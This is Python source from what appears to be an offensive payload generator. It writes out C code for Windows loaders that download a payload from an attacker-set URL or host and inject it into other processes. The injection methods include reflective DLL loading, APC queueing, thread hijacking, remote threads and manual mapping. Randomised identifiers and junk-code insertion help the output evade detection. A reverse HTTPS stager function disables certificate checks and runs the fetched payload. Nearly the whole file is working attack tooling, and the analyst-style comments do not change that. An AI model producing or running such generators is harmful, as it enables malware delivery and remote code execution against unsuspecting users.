        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
    else:

        Ret_code += "HINTERNET " + RandhInternet +  " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if(" + RandhInternet +  " != NULL){\n"
        Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet +  ",\"" + ModOpt["UrlTarget"] + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE | INTERNET_FLAG_NO_CACHE_WRITE, 0);\n"
        Ret_code += "unsigned char * " + Randlpv +  " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv +  "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer +  " = " + Randlpv +  ";\n"
        Ret_code += "DWORD " + RandvarBRead +  ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL RandisRead = InternetReadFile(" + RandhURL + "," + Randpointer +  ", 1024, &" + RandvarBRead +  ");\n"

    Ret_code += Randpointer +  " += " + RandvarBRead +  ";\n"
    Ret_code += "}while(" + RandvarBRead +  " > 0);\n"

    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    if ModOpt["ExecMethod"] in ["ReflectiveDll","RD","RDAPC","RDTC"]:

        Ret_code += "UINT_PTR " + RandBaseAddr +  " = (UINT_PTR)" + Randlpv +  ";\n"
        Ret_code += "UINT_PTR " + RandExportDir +  " = " + RandBaseAddr +  " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr +  ")->e_lfanew;\n"
        Ret_code += "UINT_PTR " + RandArrName +  " = (UINT_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir +  ")->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];\n"
        Ret_code += RandExportDir +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_DATA_DIRECTORY)" + RandArrName +  ")->VirtualAddress, " + RandBaseAddr +  " );\n"
        Ret_code += RandArrName +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfNames, " + RandBaseAddr +  " );\n"
        Ret_code += "UINT_PTR " + RandArrAddr +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfFunctions, " + RandBaseAddr +  " );\n"
        Ret_code += "UINT_PTR " + RandOrdName +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfNameOrdinals, " + RandBaseAddr +  " );\n"
        Ret_code += "DWORD " + RandCounter +  " = ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->NumberOfNames;\n"
        Ret_code += "DWORD " + RandLoaderOffset +  ";\n"
        Ret_code += "while( " + RandCounter +  "-- ){\n"
        Ret_code += "char * " + RandExportedFunc +  " = (char *)(" + RandBaseAddr +  " + " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrName +  ")," + RandBaseAddr +  "));\n"
        Ret_code += "if(strstr( " + RandExportedFunc +  ", \"ReflectiveLoader\" ) != NULL){\n"
        Ret_code += RandArrAddr +  " = " + RandBaseAddr +  " + " + RandFuncRva2Offset + "(((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir +  ")->AddressOfFunctions, " + RandBaseAddr +  " );\n"
        Ret_code += RandArrAddr +  " += (*(WORD *)(" + RandOrdName +  ")*sizeof(DWORD));\n"
        Ret_code += RandLoaderOffset +  " = " + RandFuncRva2Offset + "(*(DWORD *)(" + RandArrAddr +  ")," + RandBaseAddr + ");}\n"
        Ret_code += RandArrName +  " += sizeof(DWORD);\n"
        Ret_code += RandOrdName +  " += sizeof(WORD);}\n"

        if ModOpt["DynImport"] == True:

            NdcVirtualAllocEx = varname_creator()
            NdcWriteProcessMemory = varname_creator()

            Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
            Ret_code += "LPVOID " + Randlpv2 +  " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess +  ",NULL," + RandvarFsize +  ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess +  "," + Randlpv2 +  "," + Randlpv +  "," + RandvarFsize +  ",NULL);\n"

        else:

            Ret_code += "LPVOID " + Randlpv2 +  " = VirtualAllocEx(" + RandhProcess +  ",NULL," + RandvarFsize +  ",MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess +  "," + Randlpv2 +  "," + Randlpv +  "," + RandvarFsize +  ",NULL);\n"

        if "APC" in ModOpt["ExecMethod"]:

            RandThreadsnapshot = varname_creator()
            RandTargetThread = varname_creator()
            RandTentry = varname_creator()
            RandAPC = varname_creator()


            Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n"
            Ret_code += "THREADENTRY32 " + RandTentry + ";\n"
            Ret_code += RandTentry + ".dwSize = sizeof(THREADENTRY32);\n"
            Ret_code += "PTHREAD_START_ROUTINE " + RandAPC + " = (PTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  "+" + RandLoaderOffset + ");\n" 

            if ModOpt["DynImport"] == True:
                User32 = varname_creator()

                NdcThread32First = varname_creator()
                NdcThread32Next = varname_creator()
                NdcOpenThread = varname_creator()
                NdcQueueAPC = varname_creator()

                Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
                Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
                Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
                Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
                Ret_code += "FARPROC " + NdcQueueAPC + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"QueueUserAPC\");\n"
                Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += NdcQueueAPC + "((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
                Ret_code += "}while(" + NdcThread32Next + "(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"

            else:

                Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"                
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_ALL_ACCESS ,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "QueueUserAPC((PAPCFUNC)" + RandAPC + "," + RandTargetThread + ",(ULONG_PTR)NULL);}}\n"
                Ret_code += "}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"


        elif "TC" in ModOpt["ExecMethod"]:
   
            RandThreadsnapshot = varname_creator()
            RandTargetThread = varname_creator()
            RandTentry = varname_creator()
            RandContext = varname_creator()
            RandRemCtx = varname_creator()
            RandRemStack = varname_creator()


            Ret_code += "HANDLE " + RandThreadsnapshot + " = INVALID_HANDLE_VALUE;\n" 
            Ret_code += "THREADENTRY32 " + RandTentry + ";\n" 

            if ModOpt["DynImport"] == True:
                NdcThread32First = varname_creator()
                NdcThread32Next = varname_creator()
                NdcOpenThread = varname_creator()
                NdcSuspendThread = varname_creator()
                NdcGetThreadContext = varname_creator()
                NdcSetThreadContext = varname_creator()
                NdcResumeThread = varname_creator()
                #NdcTl32Snapshot = varname_creator()
                #Ret_code += "HANDLE " + User32 + " = GetModuleHandle(\"user32.dll\");\n"
                Ret_code += "FARPROC " + NdcThread32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32First\");\n"
                Ret_code += "FARPROC " + NdcThread32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Thread32Next\");\n"
                Ret_code += "FARPROC " + NdcOpenThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenThread\");\n"
                Ret_code += RandThreadsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!" + NdcThread32First + "(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot + ");}\n"
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = (HANDLE)" + NdcOpenThread + "(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "CONTEXT " + RandContext + ";\n"
                Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
                Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
                Ret_code += "FARPROC " + NdcSuspendThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SuspendThread\");\n"
                Ret_code += "if(" + NdcSuspendThread + "(" + RandTargetThread + ") != -1){\n"
                Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
                Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"GetThreadContext\");\n"
                Ret_code += "if(" + NdcGetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ")){\n"       
                #Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"VirtualAllocEx\");\n"        
                Ret_code += RandRemCtx + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
                #Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"WriteProcessMemory\");\n"                 
                Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"

                if ModOpt["Arch"] == "x86":

                    Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n" # GIUSTO??

                elif ModOpt["Arch"] == "x64":

                    Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n"
                    Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
                    Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 +  ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"

                    #let stack have some room to grow up or down
                    Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"

                Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"SetThreadContext\");\n"
                Ret_code += NdcSetThreadContext + "(" + RandTargetThread + ",&" + RandContext + ");\n"
                Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"ResumeThread\");\n"
                Ret_code += NdcResumeThread + "(" + RandTargetThread + ");\n"
                Ret_code += "break;"
                Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"
            else:
                Ret_code += RandThreadsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);\n"
                Ret_code += "if(" + RandThreadsnapshot + " != INVALID_HANDLE_VALUE){\n"
                Ret_code += "if(!Thread32First(" + RandThreadsnapshot + ",&" + RandTentry + ")){ CloseHandle(" + RandThreadsnapshot +");}\n"                
                Ret_code += "do{\n"
                Ret_code += "if(" + RandTentry + ".th32OwnerProcessID == " + Randentry + ".th32ProcessID){\n"
                Ret_code += "HANDLE " + RandTargetThread + " = OpenThread(THREAD_SUSPEND_RESUME|THREAD_SET_CONTEXT|THREAD_GET_CONTEXT,FALSE," + RandTentry + ".th32ThreadID);\n"
                Ret_code += "if(" + RandTargetThread + " != NULL){\n"
                Ret_code += "CONTEXT " + RandContext + ";\n"
                Ret_code += "PVOID " + RandRemCtx + " = NULL;\n"
                Ret_code += "PVOID " + RandRemStack + " = NULL;\n"
                Ret_code += "if(SuspendThread(" + RandTargetThread + ") != -1){\n"
                Ret_code += RandContext + ".ContextFlags = CONTEXT_FULL;\n"
                Ret_code += "if(GetThreadContext(" + RandTargetThread + ",&" + RandContext + ")){\n"
                Ret_code += RandRemCtx + " = VirtualAllocEx(" + RandhProcess + ", NULL,sizeof(" + RandContext + "),MEM_COMMIT,PAGE_READWRITE);\n"
                Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandRemCtx + ",&" + RandContext + ",sizeof(" + RandContext + "),NULL);\n"

                if ModOpt["Arch"] == "x86":

                    Ret_code += RandContext + ".Eip = (DWORD)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n" # GIUSTO??

                elif ModOpt["Arch"] == "x64":

                    Ret_code += RandContext + ".Rip = (DWORD64)" + Randlpv2 +  " + " + RandLoaderOffset +  ";\n"
                    Ret_code += RandContext + ".Rcx = (DWORD64)" + RandRemCtx + ";\n"
                    Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)(((LPBYTE)" + Randlpv2 +  ")+2),&" + RandContext + ".Rcx,sizeof(" + RandContext + ".Rcx),NULL);\n"

                    #let stack have some room to grow up or down
                    Ret_code += RandContext + ".Rsp = " + RandContext + ".Rsp - 0x2000;\n"

                Ret_code += "SetThreadContext(" + RandTargetThread + ",&" + RandContext + ");\n"
                Ret_code += "ResumeThread(" + RandTargetThread + ");\n"
                Ret_code += "break;"
                Ret_code += "}}}}}while(Thread32Next(" + RandThreadsnapshot + ",&" + RandTentry + "));}\n"

        else:

            if ModOpt["DynImport"] == True:

                NdcCreateRemoteThread = varname_creator()

                Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
                Ret_code += "HANDLE " + RandhThread +  " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess +  ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  " + " + RandLoaderOffset +  "),NULL,0,NULL);\n"


            else:

                Ret_code += "HANDLE " + RandhThread +  " = CreateRemoteThread(" + RandhProcess +  ", NULL,1024*1024,(LPTHREAD_START_ROUTINE)((ULONG_PTR)" + Randlpv2 +  " + " + RandLoaderOffset +  "),NULL,0,NULL);\n"



    elif ModOpt["ExecMethod"] in ["ManualMap","MM"]:

        NdcVirtualAllocEx = varname_creator()
        NdcWriteProcessMemory = varname_creator()

        Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
        Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
        Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
        Ret_code += "HANDLE " + RandhThread + ";\n"
        Ret_code += "LPVOID " + Randlpv2 + "," + RandLoaderMem + ";\n"
        Ret_code += "DWORD " + Randflag + ";\n"
        Ret_code += RandLoadStruct + " " + RandPtrLoader+ ";\n"
        Ret_code += RandImgDosHeader + "=(PIMAGE_DOS_HEADER)" + Randlpv + ";\n"
        Ret_code += RandImgNTHeader + "=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n"
        Ret_code += "if((" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_DLL)){\n"

        if ModOpt["DynImport"] == True:

            Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + ModOpt["NtdllHandle"] + ", \"WriteProcessMemory\");\n"
            Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(" + Randlpv2 + " == NULL){\n"
            Ret_code += Randlpv2 + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
            Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
            Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
            Ret_code += RandLoaderMem + " = (LPVOID)" + NdcVirtualAllocEx + "(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"

        else:

            Ret_code += Randlpv2 + " = VirtualAllocEx(" + RandhProcess + ",(LPVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase), " + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(" + Randlpv2 + " == NULL){\n"
            Ret_code += Randlpv2 + "=VirtualAllocEx(" + RandhProcess + ",NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + "," + Randlpv2 + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
            Ret_code += RandImgSectHeader + "=(PIMAGE_SECTION_HEADER)(" + RandImgNTHeader + "+1);\n"
            Ret_code += "for(" + Randflag + "=0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((LPBYTE)" + Randlpv2 + "+" + RandImgSectHeader + "[" + Randflag + "].VirtualAddress),(LPVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "[" + Randflag + "].PointerToRawData)," + RandImgSectHeader + "[" + Randflag + "].SizeOfRawData,NULL);}\n"
            Ret_code += RandLoaderMem + " = VirtualAllocEx(" + RandhProcess + ",NULL,4096,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"


        Ret_code += "memset(&" + RandPtrLoader+ ",0,sizeof(" + RandLoadStruct + "));\n"
        Ret_code += RandPtrLoader+ ".ImageBase=" + Randlpv2 + ";\n"
        Ret_code += RandPtrLoader+ ".NtHeaders=(PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv2 + "+" + RandImgDosHeader + "->e_lfanew);\n"
        Ret_code += RandPtrLoader+ ".BaseRelocation=(PIMAGE_BASE_RELOCATION)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);\n"
        Ret_code += RandPtrLoader+ ".ImportDirectory=(PIMAGE_IMPORT_DESCRIPTOR)((LPBYTE)" + Randlpv2 + "+" + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);\n"
        Ret_code += RandPtrLoader+ ".fnLoadLibraryA=LoadLibraryA;\n"
        Ret_code += RandPtrLoader+ ".fnGetProcAddress=GetProcAddress;\n"
        #Ret_code += RandPtrLoader+ ".fnRtlAddFunctionTable=RtlAddFunctionTable;\n"

        if ModOpt["DynImport"] == True:

            NdcCreateRemoteThread = varname_creator()
            NdcWaitForSingleObject = varname_creator()

            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
            Ret_code += NdcWriteProcessMemory + "(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
            Ret_code += "FARPROC " + NdcCreateRemoteThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateRemoteThread\");\n"
            Ret_code += RandhThread + " = (HANDLE)" + NdcCreateRemoteThread + "(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
            Ret_code += "FARPROC " + NdcWaitForSingleObject + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"
            Ret_code += NdcWaitForSingleObject + "(" + RandhThread + ",-1);}\n"


        else:
            Ret_code += "WriteProcessMemory(" + RandhProcess + "," + RandLoaderMem + ",&" + RandPtrLoader+ ",sizeof(" + RandLoadStruct + "),NULL);\n"
            Ret_code += "WriteProcessMemory(" + RandhProcess + ",(LPVOID)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1),LoadDll,(SIZE_T)LoadDllEnd-(SIZE_T)LoadDll,NULL);\n"
            Ret_code += RandhThread + "=CreateRemoteThread(" + RandhProcess + ",NULL,0,(LPTHREAD_START_ROUTINE)((P" + RandLoadStruct + ")" + RandLoaderMem + "+1)," + RandLoaderMem + ",0,NULL);\n"
            Ret_code += "WaitForSingleObject(" + RandhThread + ",-1);}\n"
            #Ret_code += "DWORD Exitcode;\n"
            #Ret_code += "GetExitCodeThread(" + RandhThread + ",&Exitcode);\n"

    Ret_code += "}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])
    
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
def RevHttpsStager_C_windows(ModOpt):
    """Assemble the C source of a WinINet HTTPS stager and write it to Source.c.

    The function only builds text: it concatenates C statements into
    ``Ret_code`` and passes the result to ``WriteSource("Source.c", ...)``.
    Nothing is compiled or executed here.

    Behaviour of the generated program, as far as this function shows it:
    open a WinINet session, connect to ``ModOpt["Lhost"]``:``ModOpt["Lport"]``
    with INTERNET_FLAG_SECURE, issue one request to a path returned by
    ``UriGenerator()``, set INTERNET_OPTION_SECURITY_FLAGS so that
    certificate errors are ignored, read the response body into a buffer
    set up by ``inject_utils.Win_MemLocal``, then hand that buffer to either
    ``inject_utils.Win_LocalThread`` or ``inject_utils.Win_RemoteInjection``.

    Args:
        ModOpt: option dictionary. Keys read here: "MemAlloc", "ExecMethod",
            "Lhost", "Lport", "Arch", "Outformat", "Reflective" (dll output
            only), "DynImport", "JI", "JF", "EF", "JR". Keys written here:
            "Lhost", "Buff", "Lpvoid", "Decoder", "Bufflen", and, when
            "DynImport" is True, "NtdllHandle" and "Ker32Handle". The dict is
            mutated in place and also passed on to the helper functions.

    Returns:
        None. The only visible output is the WriteSource("Source.c", ...) call.

    Review notes for analysts reading the generated artifact:
        * Every C identifier comes from varname_creator(), so variable names
          differ per build and are not stable indicators; the API sequence
          and the constant flag values are.
        * Certificate validation is switched off in the generated client, so
          the TLS channel authenticates nothing about the server.
        * With "DynImport" the WinINet calls go through
          GetModuleHandle/GetProcAddress instead of direct calls.
    """

    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # CheckForBackslash is defined elsewhere; presumably it escapes the host
    # string so it can sit inside a C string literal -- confirm against helper.
    ModOpt["Lhost"] = CheckForBackslash(ModOpt["Lhost"])

    # One generated identifier per C variable used below. Several of these
    # (SumValueFunc, RandCharArray, RandCharset, RandInteger, RandRecv_int,
    # ChecksumFunction, RandCharPtr2, RandFuncFlag1, RandFuncFlag2) are not
    # referenced again in this function.
    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhConnect = varname_creator()
    RandhRequest = varname_creator()
    RandwFlags = varname_creator()
    RandISOResult = varname_creator()
    RandisSend = varname_creator()
    RandwByteRead = varname_creator()
    RandisRead = varname_creator()
    SumValueFunc = varname_creator()
    RandCharArray = varname_creator()
    RandCharset = varname_creator()
    RandInteger = varname_creator()
    RandRecv_int = varname_creator()
    ChecksumFunction = varname_creator()
    RandCharPtr2 = varname_creator()
    RandFuncFlag1 = varname_creator()
    RandFuncFlag2 = varname_creator()

    # NOTE(review): MemAlloc and ExecMethod were already read at the top of
    # the function; Arch is assigned but not used afterwards in this function.
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # "Buff" is always the receive-buffer variable. "Lpvoid" is a separate
    # identifier only for the SharedSection allocator; otherwise both names
    # refer to the same C variable. How the helpers use the two keys is
    # defined in inject_utils (not shown here).
    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    # The string "False" (not the boolean) marks "no decoder stub".
    ModOpt["Decoder"] = "False"

    # Passed on as a string; presumably the allocation size used by
    # Win_MemLocal -- TODO confirm in inject_utils.
    ModOpt["Bufflen"] = "8000000"

    Ret_code = ""

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    # The generic headers go through IncludeShuffler; tlhelp32.h and
    # wininet.h are always appended after them in a fixed order.
    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    Ret_code += "#include <wininet.h>\n"

    # Entry point: a plain main() for exe output, DllMain guarded by
    # DLL_PROCESS_ATTACH for dll output. The blocks opened here are closed
    # at the very end of this function.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    # Dynamic-import mode: emit module handles for ntdll.dll and kernel32.dll
    # and publish their variable names through ModOpt for the helpers.
    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are literal marker lines in the text;
    # presumably JunkInjector (called below) consumes them -- confirm there.
